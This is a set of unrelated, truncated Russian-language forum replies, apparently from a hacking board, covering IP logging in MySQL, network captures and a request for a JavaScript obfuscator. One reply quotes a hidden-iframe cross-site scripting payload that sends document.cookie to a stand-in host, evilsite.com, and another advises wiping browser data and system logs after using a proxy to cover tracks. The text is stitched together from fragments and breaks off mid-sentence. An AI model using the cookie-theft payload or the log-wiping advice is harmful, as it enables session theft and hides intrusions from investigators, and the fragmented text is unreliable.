Separate names with a comma.
Виртуальная память php это mysql. Создавай там таблицу ,поля буду там для IP адресов и для количества ввода и для каждого IP. Это все.
и так работает <iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>
scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.
удали весь кэш из браузеров и все сохраненные пароли (для прокси)в браузере которым ты пользовался или поставь девственную винду, при этом весь...
если столько много времени прошло ,то ни че не будет...ну ты все равно не пользуйся проксей. И попытайся стереть все логи твоей системы и поменять...
Подскажите бесплатный JavaScript обфускатор. Заранее спасибо.
Че то похоже на бред...че то не подробного описание уязвимости. И все антивирусы содержут этот баг, да не может быть такого.
да попробуй скриптом поделить на куски, а потом каждый пихать либо в TCPDUMP, либо в Wireshark.